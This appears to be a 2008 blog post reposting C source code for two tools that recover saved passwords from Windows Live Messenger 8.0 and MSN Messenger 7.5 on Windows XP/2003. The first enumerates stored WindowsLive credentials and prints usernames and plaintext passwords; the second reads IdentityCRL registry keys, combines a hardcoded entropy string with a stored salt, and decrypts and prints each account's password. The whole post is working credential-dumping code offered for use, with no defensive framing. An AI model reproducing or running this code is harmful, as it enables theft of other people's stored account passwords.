4月 16th, 2008MSN password finder
/**
** Windows Live Messenger v8.0 Password Finder for Windows XP & 2003
** (Compiled-VC++ 6.0 SP6, tested on WinXP SP2, Windows Live Messenger
8.0.0812.00)
** - Gregory R. Panakkal
** http://www.crapware.tk/
** http://www.infogreg.com/
**/
#define WIN32_LEAN_AND_MEAN
#include <windows.h>
#include <stdio.h>
#include <tchar.h>
//Following definitions taken from wincred.h
//[available only in Oct 2002 MS Platform SDK / LCC-Win32 Includes]
typedef struct _CREDENTIAL_ATTRIBUTEA {
LPSTR Keyword;
DWORD Flags;
DWORD ValueSize;
LPBYTE Value;
}
CREDENTIAL_ATTRIBUTEA,*PCREDENTIAL_ATTRIBUTEA;
typedef struct _CREDENTIALA {
DWORD Flags;
DWORD Type;
LPSTR TargetName;
LPSTR Comment;
FILETIME LastWritten;
DWORD CredentialBlobSize;
LPBYTE CredentialBlob;
DWORD Persist;
DWORD AttributeCount;
PCREDENTIAL_ATTRIBUTEA Attributes;
LPSTR TargetAlias;
LPSTR UserName;
} CREDENTIALA,*PCREDENTIALA;
typedef CREDENTIALA CREDENTIAL;
typedef PCREDENTIALA PCREDENTIAL;
////////////////////////////////////////////////////////////////////
typedef BOOL (WINAPI *typeCredEnumerate)(LPCTSTR, DWORD, DWORD *,
PCREDENTIAL **);
typedef VOID (WINAPI *typeCredFree)(PVOID);
typeCredEnumerate pfCredEnumerate = NULL;
typeCredFree pfCredFree = NULL;
////////////////////////////////////////////////////////////////////
void showBanner()
{
_tprintf(_T("Windows Live Messenger Password Finder for Windows XP &
2003\n"));
_tprintf(_T(" - Gregory R. Panakkal, http://www.infogreg.com
\n\n"));
}
////////////////////////////////////////////////////////////////////
int main()
{
PCREDENTIAL *CredentialCollection = NULL;
HMODULE hAdvapi32DLL = NULL;
DWORD dwCount = 0;
DWORD dwTempIndex = 0;
BOOL bOK = FALSE;
showBanner();
do
{
hAdvapi32DLL = LoadLibrary(_T("advapi32.dll"));
if(NULL == hAdvapi32DLL)
{
_tprintf(_T("Error loading advapi32.dll\n"));
break;
}
#ifdef _UNICODE
pfCredEnumerate =
(typeCredEnumerate)GetProcAddress(hAdvapi32DLL,
"CredEnumerateW");
#else
pfCredEnumerate =
(typeCredEnumerate)GetProcAddress(hAdvapi32DLL,
"CredEnumerateA");
#endif
pfCredFree = (typeCredFree)GetProcAddress(hAdvapi32DLL,
"CredFree");
if( pfCredEnumerate == NULL||
pfCredFree == NULL )
{
_tprintf(_T("Error loading Cred APIs\n"));
break;
}
//Get an array of ‘credential’, satisfying the filter
bOK = pfCredEnumerate(
_T("WindowsLive:name=*"),
0,
&dwCount,
&CredentialCollection
);
if(FALSE == bOK)
{
_tprintf(_T("Error enumerating credentials\n"));
break;
}
for(dwTempIndex=0; dwTempIndex<dwCount; dwTempIndex++)
{
_tprintf(
_T("Username : %s\n"),
CredentialCollection[dwTempIndex]->UserName
);
_tprintf(
_T("Password : %s\n\n"),
CredentialCollection[dwTempIndex]->CredentialBlob
);
}
//Free credential collection
pfCredFree(CredentialCollection);
} while(false);
//Free lib
if(NULL != hAdvapi32DLL)
{
FreeLibrary(hAdvapi32DLL);
}
return TRUE;
}
/*
* MSN Messenger v7.5 Password Decrypter Source Code for Windows XP & 2003
* (Compiled - VC++ 2005, Tested on WinXP SP2, MSN Messenger v7.5.0324)
* - Gregory R. Panakkal
* http://www.infogreg.com/
*/
#include <windows.h>
#include <wincrypt.h>
#include <stdio.h>
#include <WinCred.h>
#include <tchar.h>
#pragma comment(lib, "Crypt32.lib")
void showBanner()
{
_tprintf(_T("MSN Messenger v7.5 Password Decrypter for Windows XP/2003\n"));
_tprintf(_T(" - Gregory R. Panakkal, http://www.infogreg.com \n\n"));
}
////////////////////////////////////////////////////////////////////
int main()
{
PCREDENTIAL* CredentialCollection = NULL;
DATA_BLOB blobCrypt;
DATA_BLOB blobPlainText;
DATA_BLOB blobEntropy;
DATA_BLOB blobDynEntropy;
HKEY hKeyDynSalt = NULL;
HKEY hKeyCreds = NULL;
HKEY hKeyUserCred = NULL;
DWORD dwRet = 0;
DWORD dwType = 0;
DWORD dwDataSize = 0;
DWORD dwTemp = 0;
PBYTE pDynamicSalt = NULL;
PBYTE pEncPassword = NULL;
TCHAR szMsgrUserName[MAX_PATH];
DWORD dwCount = 0;
REGSAM RegSAM = KEY_READ;
WCHAR szEntropy[] = L"%GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd";
ZeroMemory(&blobCrypt, sizeof(blobCrypt) );
ZeroMemory(&blobPlainText, sizeof(blobPlainText) );
ZeroMemory(&blobEntropy, sizeof(blobEntropy) );
ZeroMemory(&blobDynEntropy, sizeof(blobDynEntropy) );
showBanner();
do
{
//
// Allocate some memory!
//
pEncPassword = (PBYTE)malloc( MAX_PATH );
if(NULL == pEncPassword)
{
_tprintf(_T("ERROR: malloc failed!"));
break;
}
//
// Fetch & Calculate Dynamic Salt
//
dwRet = RegOpenKeyEx(
HKEY_CURRENT_USER,
_T("SOFTWARE\\MICROSOFT\\IdentityCRL\\Dynamic Salt"),
0,
RegSAM,
&hKeyDynSalt
);
if(ERROR_SUCCESS != dwRet)
{
_tprintf(_T("ERROR: Cannot opening dynamic salt reg key!"));
break;
}
dwTemp = sizeof(dwDataSize);
dwRet = RegQueryValueEx(
hKeyDynSalt,
_T("Size"),
NULL,
&dwType,
(LPBYTE)&dwDataSize,
&dwTemp
);
if( ERROR_SUCCESS != dwRet ||
REG_DWORD != dwType ||
sizeof(DWORD) != dwTemp )
{
_tprintf(_T("ERROR: Cannot fetch dynamic salt data size!"));
break;
}
pDynamicSalt = (PBYTE)malloc( dwDataSize );
if(NULL == pDynamicSalt)
{
_tprintf(_T("ERROR: malloc failed!"));
break;
}
dwTemp = dwDataSize;
dwRet = RegQueryValueEx(
hKeyDynSalt,
_T("Value"),
NULL,
&dwType,
(LPBYTE)pDynamicSalt,
&dwTemp);
if( ERROR_SUCCESS != dwRet ||
REG_BINARY != dwType ||
dwDataSize != dwTemp )
{
_tprintf(_T("ERROR: Cannot fetch dynamic salt data!"));
break;
}
//Initial Crypt Blob
blobCrypt.pbData = (LPBYTE)pDynamicSalt;
blobCrypt.cbData = dwDataSize;
//Initialize Entropy Blob
blobEntropy.pbData = (LPBYTE)&szEntropy;
blobEntropy.cbData = 0×40;
if(FALSE == CryptUnprotectData(
&blobCrypt,
NULL,
&blobEntropy,
NULL,
NULL,
1,
&blobPlainText
))
{
//something
break;
}
//
// Construct the 128 Char long Entropy value
//
memcpy(
blobCrypt.pbData,
blobEntropy.pbData, blobEntropy.cbData
);
memcpy(
blobCrypt.pbData + blobEntropy.cbData,
blobPlainText.pbData,
blobPlainText.cbData
);
blobEntropy.cbData += blobPlainText.cbData;
blobEntropy.pbData = blobCrypt.pbData;
//Free memory & Zero-off Blob structure
LocalFree(blobPlainText.pbData);
ZeroMemory(&blobPlainText, sizeof(blobPlainText));
//
// Enumerate all the stored credentials in the registry
//
dwRet = RegOpenKeyEx(
HKEY_CURRENT_USER,
_T("SOFTWARE\\MICROSOFT\\IdentityCRL\\Creds"),
0,
RegSAM,
&hKeyCreds
);
if(ERROR_SUCCESS != dwRet)
{
_tprintf(_T("ERROR: Cannot opening credential key!"));
break;
}
while( true )
{
dwRet = RegEnumKey(
hKeyCreds,
dwCount,
(LPTSTR)&szMsgrUserName,
MAX_PATH
);
if( ERROR_SUCCESS != dwRet )
{
break;
}
dwRet = RegOpenKeyEx(
hKeyCreds,
szMsgrUserName,
0,
RegSAM,
&hKeyUserCred
);
if(ERROR_SUCCESS == dwRet)
{
dwTemp = MAX_PATH;
//
// Read encrypted passsword
//
dwRet = RegQueryValueEx(
hKeyUserCred,
_T("ps:password"),
NULL,
&dwType,
(LPBYTE)pEncPassword,
&dwTemp);
if( ERROR_SUCCESS == dwRet &&
REG_BINARY == dwType )
{
blobCrypt.pbData = (LPBYTE)pEncPassword;
blobCrypt.cbData = dwTemp;
//
// Decrypt & Display Credential Info!
//
if(TRUE == CryptUnprotectData(
&blobCrypt,
NULL,
&blobEntropy,
NULL,
NULL,
1,
&blobPlainText
))
{
_tprintf(
_T("Username : %s\nPassword : %ws\n\n"),
szMsgrUserName,
blobPlainText.pbData
);
LocalFree(blobPlainText.pbData);
}
}
//Close User Cred Key
RegCloseKey(hKeyUserCred);
hKeyUserCred = NULL;
}
dwCount++;
}
}while(false);
if(NULL != pDynamicSalt)
{
free(pDynamicSalt);
}
if(NULL != pEncPassword)
{
free(pEncPassword);
}
if(NULL != hKeyCreds)
{
RegCloseKey(hKeyCreds);
}
if(NULL != hKeyDynSalt)
{
RegCloseKey(hKeyDynSalt);
}
}